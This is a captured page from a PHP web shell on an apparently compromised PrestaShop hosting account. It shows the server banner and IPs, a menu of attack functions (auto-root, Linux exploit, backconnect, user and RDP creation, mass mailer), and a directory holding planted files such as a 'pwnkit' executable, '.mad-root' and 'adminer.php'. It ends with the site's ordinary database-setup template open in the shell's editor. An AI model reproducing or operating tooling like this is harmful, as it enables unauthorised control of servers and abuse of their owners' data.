Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.216.43
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
install /
theme /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
autoload_classmap.php
0
B
-r--r--r--
configure.phtml
8.42
KB
-rw----r--
database.phtml
3.15
KB
-rw----r--
footer.phtml
2.19
KB
-rw----r--
header.phtml
4.89
KB
-rw----r--
index.php
1.24
KB
-rw----r--
license.phtml
1.52
KB
-rw----r--
license_content.phtml
21.16
KB
-rw----r--
process.phtml
5.2
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
system.phtml
1.49
KB
-rw----r--
welcome.phtml
2.17
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : database.phtml
<?php $this->displayTemplate('header') ?> <!-- Database configuration --> <div id="dbPart"> <h2><?php echo $this->l('Configure your database by filling out the following fields') ?></h2> <p> <?php echo $this->l('To use PrestaShop, you must <a href="http://doc.prestashop.com/display/PS16/Installing+PrestaShop#InstallingPrestaShop-Creatingadatabaseforyourshop" target="_blank">create a database</a> to collect all of your store\'s data-related activities.') ?> <br /> <?php echo $this->l('Please complete the fields below in order for PrestaShop to connect to your database. ') ?> </p> <div id="formCheckSQL"> <p class="first" style="margin-top: 15px;"> <label for="dbServer"><?php echo $this->l('Database server address') ?> </label> <input size="25" class="text" type="text" id="dbServer" name="dbServer" value="<?php echo htmlspecialchars($this->database_server) ?>" /> <span class="userInfos aligned"><?php echo $this->l('The default port is 3306. To use a different port, add the port number at the end of your server\'s address i.e ":4242".') ?></span> </p> <p> <label for="dbName"><?php echo $this->l('Database name') ?> </label> <input size="10" class="text" type="text" id="dbName" name="dbName" value="<?php echo htmlspecialchars($this->database_name) ?>" /> </p> <p> <label for="dbLogin"><?php echo $this->l('Database login') ?> </label> <input class="text" size="10" type="text" id="dbLogin" name="dbLogin" value="<?php echo htmlspecialchars($this->database_login) ?>" /> </p> <p> <label for="dbPassword"><?php echo $this->l('Database password') ?> </label> <input class="text" size="10" type="password" id="dbPassword" name="dbPassword" value="<?php echo htmlspecialchars($this->database_password) ?>" /> </p> <!-- <p> <label for="dbEngine"><?php echo $this->l('Database Engine') ?></label> <select id="dbEngine" name="dbEngine"> <option value="InnoDB" <?php if ($this->database_engine == 'InnoDB'): ?>selected="selected"<?php endif; ?>>InnoDB</option> <option value="MyISAM" <?php if ($this->database_engine == 'MyISAM'): ?>selected="selected"<?php endif; ?>>MyISAM</option> </select> </p>--> <p> <label for="db_prefix"><?php echo $this->l('Tables prefix')?></label> <input class="text" type="text" id="db_prefix" name="db_prefix" value="<?php echo htmlspecialchars($this->database_prefix) ?>" /> </p> <?php if (_PS_MODE_DEV_): ?> <p> <label for="db_clear"><?php echo $this->l('Drop existing tables (mode dev)')?></label> <input type="checkbox" name="database_clear" id="db_clear" value="1" <?php if ($this->database_clear): ?>checked="checked"<?php endif; ?> /> </p> <?php endif; ?> <p class="aligned last"> <input id="btTestDB" class="button" type="button" value="<?php echo $this->l('Test your database connection now!') ?>"/> </p> <input class="text" type="hidden" id="rewrite_engine" name="rewrite_engine" value="0" /> <?php if ($this->errors): ?> <p id="dbResultCheck" class="errorBlock"><?php echo implode('<br />', $this->errors) ?></p> <?php else: ?> <p id="dbResultCheck" style="display: none;"></p> <?php endif; ?> </div> </div> <?php $this->displayTemplate('footer') ?>
Close